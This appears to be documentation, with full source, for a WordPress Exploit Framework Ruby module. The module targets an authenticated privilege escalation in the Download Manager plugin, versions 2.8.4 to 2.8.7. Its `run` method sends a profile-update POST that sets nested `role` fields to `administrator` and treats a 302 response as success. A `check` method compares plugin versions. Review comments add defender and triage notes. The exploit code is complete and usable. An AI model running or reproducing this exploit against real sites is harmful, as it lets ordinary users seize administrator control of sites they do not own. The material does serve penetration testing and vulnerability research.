class Wpxf::Auxiliary::DownloadManagerAuthenticatedPrivilegeEscalation

Public Class Methods

new()
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 6
# Registers this module's descriptive metadata with the framework.
#
# Everything set here is static text: the display name, a description
# naming Download Manager 2.8.4 to 2.8.7 as the affected range, the
# credits, the advisory references and the disclosure date. No request
# is made from this method.
#
# The affected range in the description is the figure a site owner can
# compare against the installed plugin version.
def initialize
  super

  # Kept with its original line breaks and indentation so the stored
  # string is unchanged.
  description = %(
      The Download Manager plugin, in versions 2.8.4 to 2.8.7,
      allows authenticated users to escalate their user role to
      that of an administrator.
    )

  credits = [
    'James Golovich', # Disclosure
    'rastating'       # WPXF module
  ]

  advisories = [
    ['WPVDB', '8365'],
    ['URL', 'http://www.pritect.net/blog/wordpress-download-manager-2-8-8-critical-security-vulnerabilities']
  ]

  metadata = {
    name: 'Download Manager Authenticated Privilege Escalation',
    desc: description,
    author: credits,
    references: advisories,
    date: 'Jan 19 2016'
  }

  update_info(**metadata)
end

Public Instance Methods

check()
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 28
# Version-based exposure check for the `download-manager` plugin.
#
# Delegates to `check_plugin_version_from_readme`, whose implementation
# is not shown here. The two version strings line up with the module
# description (affected: 2.8.4 to 2.8.7), so 2.8.8 is presumably the
# first fixed release and 2.8.4 the release that introduced the flaw.
# Confirm the argument order against the helper.
#
# NOTE(review): judging by the helper's name, the result rests on the
# version the plugin's readme reports; a stale or edited readme would
# skew it, so verify the installed version when triaging.
#
# @return whatever the helper returns (type not visible in this file)
def check
  plugin_slug = 'download-manager'
  upper_version = '2.8.8'
  lower_version = '2.8.4'

  check_plugin_version_from_readme(plugin_slug, upper_version, lower_version)
end
requires_authentication()
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 32
# Declares that this module only works with a logged-in session.
#
# The flaw described by the module is reachable by authenticated users
# only, and `run` sends the session cookie with its request. How the
# framework acts on this flag is not visible in this file.
#
# @return [Boolean] always true
def requires_authentication
  true
end
run()
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 36
# Submits one profile-update POST as the logged-in user and reports
# whether the server answered with a redirect.
#
# The form carries a `role` field set to `administrator` inside both
# the `wpdm_profile` and `pfile_data` groups. According to the module
# description, Download Manager 2.8.4 to 2.8.7 lets an authenticated
# user change their own role this way.
#
# For defenders: a profile submission from a non-administrator session
# that contains a nested `role` key in either group is the observable
# artifact of this request.
#
# NOTE(review): success is inferred only from an HTTP 302. The account
# role is not read back afterwards, so a redirect issued for any other
# reason would also be reported as success.
#
# @return [Boolean] false when the superclass `run` declines or the
#   response is not a 302; true otherwise
def run
  return false unless super

  # Built twice on purpose so each group gets its own hash, as before.
  role_fields = -> { { 'display_name' => username, 'role' => 'administrator' } }

  form = {
    'wpdm_profile'    => role_fields.call,
    'pfile_data'      => role_fields.call,
    'password'        => password,
    'cpassword'       => password,
    'payment_account' => '0'
  }

  escalated = true

  # Redirects are not followed so the 302 itself can be inspected.
  scoped_option_change('follow_http_redirection', false) do
    response = execute_post_request(url: full_uri, body: form, cookie: session_cookie)
    escalated = response.code == 302

    if escalated
      emit_success "User #{username} now has full admin rights"
    else
      emit_error 'Failed to escalate privileges'
    end
  end

  escalated
end